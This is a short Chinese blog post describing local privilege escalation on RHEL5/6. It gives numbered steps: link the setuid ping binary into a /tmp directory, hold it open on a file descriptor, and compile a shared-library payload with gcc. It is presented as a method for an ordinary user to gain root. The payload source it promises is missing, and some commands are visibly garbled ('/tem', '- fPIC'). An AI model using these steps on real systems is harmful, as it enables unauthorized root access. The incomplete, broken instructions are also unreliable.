RHEL5/6 系统提权

来源:互联网 发布:艺术与视知觉知乎 编辑:程序博客网 时间:2024/06/04 17:55

当以普通用户登录到系统后,可以通过下面方式进行系统提权

1. 查看 tmp目录权限

2. 在tmp下新建目录

3. 将ping命令的软连接指向 新建目录下的文件

4. 执行 exec 3< /tem/exploit/target

5. 查看 ll /proc/$$/fd/3

6. 编写C脚本

7.  gcc  -w - fPIC -shared -o /tmp/exploit payload.c





payload.c 脚本如下:



0 0
原创粉丝点击